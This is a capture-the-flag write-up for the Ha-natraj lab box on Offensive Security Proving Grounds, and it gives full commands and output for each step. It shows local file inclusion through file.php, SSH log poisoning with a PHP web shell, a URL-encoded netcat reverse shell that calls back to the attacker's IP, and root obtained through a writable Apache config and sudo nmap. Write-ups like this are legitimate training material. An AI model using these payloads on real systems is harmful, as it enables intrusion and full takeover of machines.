Skip to main content

Ha-natraj

This is my write ups for Ha-natraj (See original submission) on Off-Sec Proving Ground.

This room is a CTF type of room

I will try to go deep into the technical thing we do in this room.

1. Enum

  • Lets start up the box and get the IP

Getting the IP

  • Export the IP to the terminal so we can use it easier
export IP=192.168.197.80

## Test to see if the IP is correct
echo $IP
  • Start the port scan
Port Scan
## Create a directory to store the scan results
mkdir nmap

## Start a default nmap scan
nmap -sC -sV -vvv -oN nmap/default_scan $IP

## Start a rustscan for faster all port scan
rustscan -a $IP -- -oN nmap/rustscan $IP
Rustscan result
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
  • Since they have a website running, we can take a look and run gobuster to brute force web directory

Visit website

gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gob_1.log
## Result
/images               (Status: 301) [Size: 315]
/console              (Status: 301) [Size: 316]
/server-status        (Status: 403) [Size: 278]

2. Foothold

  • Go over to http://192.168.197.80/console/file.php?file=/etc/passwd and we can see the content of /etc/passwd or we can use curl
curl http://192.168.197.80/console/file.php?file=/etc/passwd
## Result
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash

  • So they have local file inclusion vulnerability. Lets find a way that we can abuse this and make it become remote code execution

  • Lets see if we can try some log poisoning

curl http://$IP/console/file.php?file=/var/log/auth.log
## Result
Sep  2 05:09:55 ubuntu sshd[360]: Received signal 15; terminating.
Jun  7 06:30:13 ubuntu systemd-logind[350]: New seat seat0.
Jun  7 06:30:13 ubuntu systemd-logind[350]: Watching system buttons on /dev/input/event0 (Power Button)
Jun  7 06:30:13 ubuntu systemd-logind[350]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jun  7 06:30:13 ubuntu sshd[404]: Server listening on 0.0.0.0 port 22.
Jun  7 06:30:13 ubuntu sshd[404]: Server listening on :: port 22.
Jun  7 06:31:02 ubuntu CRON[678]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun  7 06:31:02 ubuntu CRON[678]: pam_unix(cron:session): session closed for user root
Jun  7 06:32:01 ubuntu CRON[681]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun  7 06:32:01 ubuntu CRON[681]: pam_unix(cron:session): session closed for user root
Jun  7 06:32:44 ubuntu VGAuth[403]: vmtoolsd: Username and password successfully validated for 'root'.
Jul 26 06:56:26 ubuntu systemd-logind[417]: New seat seat0.
Jul 26 06:56:26 ubuntu systemd-logind[417]: Watching system buttons on /dev/input/event0 (Power Button)
Jul 26 06:56:26 ubuntu systemd-logind[417]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jul 26 06:56:26 ubuntu sshd[463]: Server listening on 0.0.0.0 port 22.
Jul 26 06:56:26 ubuntu sshd[463]: Server listening on :: port 22.
Jul 26 06:57:01 ubuntu CRON[659]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 26 06:57:01 ubuntu CRON[659]: pam_unix(cron:session): session closed for user root
Jul 26 06:58:01 ubuntu CRON[662]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 26 06:58:01 ubuntu CRON[662]: pam_unix(cron:session): session closed for user root
Jul 26 06:58:53 ubuntu VGAuth[454]: vmtoolsd: Username and password successfully validated for 'root'.
Jul 26 06:58:57 ubuntu VGAuth[454]: message repeated 7 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
Jul 26 06:59:01 ubuntu CRON[665]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 26 06:59:01 ubuntu CRON[665]: pam_unix(cron:session): session closed for user root
Jul 26 06:59:03 ubuntu VGAuth[454]: vmtoolsd: Username and password successfully validated for 'root'.
Dec  5 19:45:10 ubuntu VGAuth[454]: vmtoolsd: Username and password successfully validated for 'root'.
Dec  5 19:45:23 ubuntu VGAuth[454]: message repeated 8 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
Dec  5 19:46:03 ubuntu CRON[890]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:46:03 ubuntu CRON[890]: pam_unix(cron:session): session closed for user root
Dec  5 19:47:01 ubuntu CRON[900]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:47:01 ubuntu CRON[900]: pam_unix(cron:session): session closed for user root
Dec  5 19:48:01 ubuntu CRON[903]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:48:01 ubuntu CRON[903]: pam_unix(cron:session): session closed for user root
Dec  5 19:49:01 ubuntu CRON[906]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:49:01 ubuntu CRON[906]: pam_unix(cron:session): session closed for user root
Dec  5 19:49:06 ubuntu sshd[909]: Did not receive identification string from 192.168.49.197 port 58038
Dec  5 19:50:01 ubuntu CRON[910]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:50:01 ubuntu CRON[910]: pam_unix(cron:session): session closed for user root
Dec  5 19:51:01 ubuntu CRON[916]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:51:01 ubuntu CRON[916]: pam_unix(cron:session): session closed for user root
Dec  5 19:52:01 ubuntu CRON[919]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:52:01 ubuntu CRON[919]: pam_unix(cron:session): session closed for user root
Dec  5 19:53:01 ubuntu CRON[922]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:53:01 ubuntu CRON[922]: pam_unix(cron:session): session closed for user root
Dec  5 19:54:01 ubuntu CRON[925]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:54:01 ubuntu CRON[925]: pam_unix(cron:session): session closed for user root
Dec  5 19:55:01 ubuntu CRON[928]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:55:01 ubuntu CRON[928]: pam_unix(cron:session): session closed for user root
Dec  5 19:56:01 ubuntu CRON[931]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec  5 19:56:01 ubuntu CRON[931]: pam_unix(cron:session): session closed for user root
  • Look like we can read the auth.log file. Maybe we can poison it with php command and make it callback a shell to us. Lets try
## On our machine try to ssh
ssh '<?php system($_GET['cmd']); ?>'@$IP
The authenticity of host '192.168.197.80 (192.168.197.80)' can't be established.
ED25519 key fingerprint is SHA256:oikisLZJ8r96QhcB1H0OEK18JfSIUhkZ4+MmhbRuA6Y.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.197.80' (ED25519) to the list of known hosts.
<?php system($_GET[cmd]); ?>@192.168.197.80's password: 
Permission denied, please try again.
<?php system($_GET[cmd]); ?>@192.168.197.80's password:
  • Using bpython to url encode our reverse shell
>>> import urllib.parse
>>> a = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP YOUR_PORT >/tmp/f"
>>> urllib.parse.quote(a)
'rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%20YOUR_IP%20YOUR_PORT%20%3E/tmp/f'
  • To make the reverse shell callback, go over to this url
http://$IP/console/file.php?file=/var/log/auth.log&cmd=rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%20YOUR_IP%20YOUR_PORT%20%3E/tmp/f
REMEMBER

Change the <YOUR_IP> <YOUR_PORT>

3. PrivEsc

  • After getting the shell, we can upgrade it with python or python3
Upgrade shell
python(3) -c 'import pty;pty.spawn("/bin/bash")';

export TERM=xterm
  • See what user www-data can do as sudo on the machine
sudo -l

Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/systemctl start apache2
    (ALL) NOPASSWD: /bin/systemctl stop apache2
    (ALL) NOPASSWD: /bin/systemctl restart apache2
  • After looking for a while, we will notice that we have write permission on /etc/apache2/apache2.conf
ls -la /etc/apache2/apache2.conf
-rwxrwxrwx 1 root root 7224 Mar 13  2020 /etc/apache2/apache2.conf
  • With this we can change the user and group of the config file to an other user so when we make the callback, we will be that user instead of www-data
cd /tmp

cp /etc/apache2/apache2.conf .

sed -i 's/User ${APACHE_RUN_USER}/User mahakal/g' apache2.conf

sed -i 's/Group ${APACHE_RUN_GROUP}/Group mahakal/g' apache2.conf

cp apache2.conf /etc/apache2/apache2.conf

sudo /bin/systemctl restart apache2

  • After restart apache2 we will lose our shell, we need to make the callback again

  • Once again, go back to the url to make callback

http://$IP/console/file.php?file=/var/log/auth.log&cmd=rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%20YOUR_IP%20YOUR_PORT%20%3E/tmp/f
  • After we get back to the machine again, we will see that now we are user mahakal
id
uid=1001(mahakal) gid=1001(mahakal) groups=1001(mahakal)

sudo -l
Matching Defaults entries for mahakal on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakal may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/nmap
  • Become root with nmap
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

id
uid=0(root) gid=0(root) groups=0(root)

cat /var/www/local.txt /root/proof.txt
[REDACTED]
[REDACTED]
Last updated on